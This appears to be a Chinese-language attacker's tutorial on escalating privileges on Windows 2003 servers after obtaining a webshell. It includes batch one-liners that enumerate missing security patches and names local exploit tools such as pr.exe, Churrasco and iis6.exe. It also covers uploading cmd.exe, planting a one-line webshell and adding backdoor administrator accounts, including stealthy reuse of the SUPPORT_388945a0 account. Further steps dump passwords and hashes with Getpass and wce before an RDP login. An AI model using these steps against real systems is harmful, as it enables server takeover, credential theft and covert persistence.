提权方式:
操作系统漏洞提权:
systeminfo
查看未修补的补丁编号
KB952004 MS09-012 PR -pr.exe
KB956572 MS09-012 巴西烤肉
KB970483 MS09-020 IIS6溢出 -iis6.exe
LPK劫持 -lpk.dll
windows 2003>>
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191
KB2840221 KB3000061 KB2850851 KB2711167 KB2360937
KB2478960 KB2507938 KB2566454 KB2646524 KB2645640
KB2641653 KB944653 KB952004 KB971657 KB2620712
KB2393802 KB942831 KB2503665 KB2592799 KB956572
KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|
@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows
\Temp\temp.txt
通用型>>
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280
KB3143141 KB3134228 KB3079904 KB3077657 KB3124280
KB3045171 KB2829361 KB3000061 KB2850851 KB2707511
KB970483 KB2124261 KB2271195) do @type C:\Windows
\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /
q /a C:\Windows\Temp\temp.txt
查看未补漏洞 根据没有修补的补丁号码,到网上找利用程序 进行利用
提权的思路:
1.查找可读可写目录。
2.上传cmd.exe
3.查看未修补补丁的漏洞编号,根据没有修补的补丁号码,到网上寻找利用程序,进行利用。
4.上传exp进行利用。
拿到一个WebShell 之后查看对方服务器信息
查看组件支持是否支持wscript.shell命令执行组件:
执行Webshell 自带的cmd.exe 发现不可用
直接用webshell在网站根目录下写一个一句话使用菜刀链接。
提示拒绝访问 说明权限不允许,我们自己上传一个cmd.exe。上传目录要求是:可读,可写,可执行---------zqlonecmd.exe
在webshell中执行命令
Network Service是Windows 2003中新内置的一个被严格限制的账号。该用户可以执行一些简单的命令. 但不能直接net user 添加用户。
接下来我们执行检测 补丁号的脚本
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:\Windows \Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f / q /a C:\Windows\Temp\temp.txt
使用菜刀链接iis6.exe
接下来就可以:
1. 修改管理员密码
2. 创建一个新用户 添加到管理员组
3.提取当前登录用户密码 (Getpass.exe)
4. 修改帮助账号(SUPPOTR_388945a0)的密码,并添加管理员组 (比较不容易被发现,推荐使用)
5. 提取用户密码哈希值(wce.exe)
创建用户:net user 用户名 密码 /add
然后进行提权,提升为管理员;net localgroup administrators 用户名 /add
然后就可以进行远程连接 -----mstsc(远程桌面连接)
输入刚刚的用户名密码,成功登陆;